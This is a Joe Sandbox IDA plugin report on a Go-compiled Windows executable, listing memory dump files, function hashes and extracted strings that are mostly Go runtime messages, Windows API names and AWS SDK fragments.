Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: 2-by$2-by$2-by$2-by$expa$expa$expa$nd 3$nd 3$nd 3$nd 3$te k$te k$te k$te k
API String ID: 0-4277483314
Opcode ID: e1bcbf60982e89f0b4d190a4c5c4b4e7b0a6260d2b502315141597fde758d5d4
Instruction ID: 3db6348f23507a8e47f29982086165e925d0ebf107aaf28f424510dc436432cb
Opcode Fuzzy Hash: e1bcbf60982e89f0b4d190a4c5c4b4e7b0a6260d2b502315141597fde758d5d4
Instruction Fuzzy Hash: 055123B49056408FD358CF0AD198BA1BBE1BF88304F2A86FAC4588F776E7768446CF51

Function 00AEBB50 Relevance: 14.0, Strings: 11, Instructions: 250COMMON

Download Yara Rule

Strings

) must be a power of 2system huge page size (runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad pro, xrefs: 00AEBE0E, 00AEBE70
) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:, xrefs: 00AEBF5E
bad system huge page sizearena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: p, xrefs: 00AEBE29
system huge page size (runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime, xrefs: 00AEBDE2
failed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default, xrefs: 00AEBFB9
) is smaller than minimum page size (/cpu/classes/gc/mark/idle:cpu-secondssetprofilebucket: profile already setfailed to reserve page summary memoryruntime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpr, xrefs: 00AEBED2
min size of malloc header is not a size class boundarygcControllerState.findRunnable: blackening not enabledno goroutines (main called runtime.Goexit) - deadlock!goroutine running on other thread; stack unavailableclient partition does not match provided ARN, xrefs: 00AEBD9D
bad TinySizeClasskey align too bigruntime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 00AEBFCF
bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double wait, xrefs: 00AEBE8B, 00AEBF17, 00AEBFA3
system page size (elem align too big but memory size /gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantim, xrefs: 00AEBE44, 00AEBEA6, 00AEBF32
$, xrefs: 00AEBF67

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: $$) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:$) is smaller than minimum page size (/cpu/classes/gc/mark/idle:cpu-secondssetprofilebucket: profile already setfailed to reserve page summary memoryruntime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpr$) must be a power of 2system huge page size (runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad pro$bad TinySizeClasskey align too bigruntime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb$bad system huge page sizearena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: p$bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double wait$failed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default$min size of malloc header is not a size class boundarygcControllerState.findRunnable: blackening not enabledno goroutines (main called runtime.Goexit) - deadlock!goroutine running on other thread; stack unavailableclient partition does not match provided ARN$system huge page size (runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime$system page size (elem align too big but memory size /gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantim
API String ID: 0-3229082946
Opcode ID: 0f1091e22040a6ce26f645bfe83fae2d3a9720dd84e4e6e833c72cb209d3f88c
Instruction ID: 71e66d7e010914db60d87013861d5b9ce8c257a3c6241469c22bd79d388c3339
Opcode Fuzzy Hash: 0f1091e22040a6ce26f645bfe83fae2d3a9720dd84e4e6e833c72cb209d3f88c
Instruction Fuzzy Hash: C9C134B45193048FC314EF64D5887AABBE4FB88354F50896DE488C7395EB749888DFA3

Function 00B28710 Relevance: 12.7, Strings: 10, Instructions: 243COMMON

Download Yara Rule

Strings

runtime: checkdead: nmidle=runtime: checkdead: find g runlock of unlocked rwmutexsigsend: inconsistent statemakeslice: len out of rangemakeslice: cap out of rangegrowslice: len out of rangestack size not a power of 2too many callback functionstimer when must b, xrefs: 00B289C2
checkdead: no p for timercheckdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such de, xrefs: 00B28955
%, xrefs: 00B2899C
no goroutines (main called runtime.Goexit) - deadlock!goroutine running on other thread; stack unavailableclient partition does not match provided ARN partitiontls: server resumed a session with a different versiontls: server accepted 0-RTT with the wrong ci, xrefs: 00B2881E
checkdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket typ, xrefs: 00B2892F
all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typetimezone hour outside of range [0,23]failed to load environment config, %vUnsubscribeServiceChangeNotificationsgodebug: unexpected IncNonDefault of 2, xrefs: 00B28993
nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaH, xrefs: 00B28A60
checkdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer found on stack locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of rangestrings: negative Re, xrefs: 00B28AA4
nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many, xrefs: 00B28A0C
mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBali, xrefs: 00B28A36

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBali$ nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many$ nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaH$%$all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typetimezone hour outside of range [0,23]failed to load environment config, %vUnsubscribeServiceChangeNotificationsgodebug: unexpected IncNonDefault of 2$checkdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer found on stack locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of rangestrings: negative Re$checkdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket typ$checkdead: no p for timercheckdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such de$no goroutines (main called runtime.Goexit) - deadlock!goroutine running on other thread; stack unavailableclient partition does not match provided ARN partitiontls: server resumed a session with a different versiontls: server accepted 0-RTT with the wrong ci$runtime: checkdead: nmidle=runtime: checkdead: find g runlock of unlocked rwmutexsigsend: inconsistent statemakeslice: len out of rangemakeslice: cap out of rangegrowslice: len out of rangestack size not a power of 2too many callback functionstimer when must b
API String ID: 0-378851391
Opcode ID: 906e5e4c7b8d673d7ac45a01a9764dde4e661fad6d0e691cb0d5dd27c6fa2d63
Instruction ID: 6a0bf04609488fd356d1ae0b08b3a6718fcb4675a56cc0b35a3d6dd1b634ba52
Opcode Fuzzy Hash: 906e5e4c7b8d673d7ac45a01a9764dde4e661fad6d0e691cb0d5dd27c6fa2d63
Instruction Fuzzy Hash: E5A16AB450A3148FC714EF64E18466ABBE4FF88314F84896DE888C7356EB74D944DF52

Function 00AE7540 Relevance: 12.7, Strings: 10, Instructions: 199COMMON

Download Yara Rule

Strings

is not pointerBAD RANK status unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Mo, xrefs: 00AE77D9
(types from different scopes)notetsleep - waitm out of syncfailed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/, xrefs: 00AE7774
: missing method notetsleepg on g0bad TinySizeClasskey align too bigruntime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 00AE77FB
is LEAFbase of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfunc, xrefs: 00AE7625
(types from different packages)GCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremo, xrefs: 00AE773C
interface ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = , tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=, xrefs: 00AE7570
, xrefs: 00AE7746
interface conversion: freeIndex is not validoldoverflow is not nils.freeindex > s.nelemsbad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex over, xrefs: 00AE7603, 00AE77BF, 00AE7865
, not next= jobs= goid sweep B -> % util alloc free span= prev= list=, i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= (...) m=nil base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-Bucket%s, xrefs: 00AE763F
is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: , xrefs: 00AE7887

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: $ (types from different packages)GCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremo$ (types from different scopes)notetsleep - waitm out of syncfailed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/$ is LEAFbase of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfunc$ is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: $ is not pointerBAD RANK status unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Mo$, not next= jobs= goid sweep B -> % util alloc free span= prev= list=, i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= (...) m=nil base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-Bucket%s$: missing method notetsleepg on g0bad TinySizeClasskey align too bigruntime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb$interface conversion: freeIndex is not validoldoverflow is not nils.freeindex > s.nelemsbad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex over$interface ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = , tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=
API String ID: 0-636850514
Opcode ID: 3f474e074f0831912ff3a519123a959484c6999e4b09d4140f1a0052997bbde9
Instruction ID: a66d96037a284c13e7a6b5753064a352abbeea3723608c271b1cbf364f7bb60e
Opcode Fuzzy Hash: 3f474e074f0831912ff3a519123a959484c6999e4b09d4140f1a0052997bbde9
Instruction Fuzzy Hash: B1A18AB46083809FD318DF29D190A5EBBF1BB88704F50896DF8D987361DB75A948DF42

Function 00B42740 Relevance: 12.7, Strings: 10, Instructions: 175COMMON

Download Yara Rule

Strings

etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor, xrefs: 00B4291C
!, xrefs: 00B42A15
types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS, xrefs: 00B428F2
not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL, xrefs: 00B428A7
runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefractional secondCanSe, xrefs: 00B42854, 00B42985
- NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDl, xrefs: 00B429D8
runtime: type offset base pointer out of rangeruntime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Type.ConvertibleToPSSWithSHA256PSSWithSHA384PSSW, xrefs: 00B42962
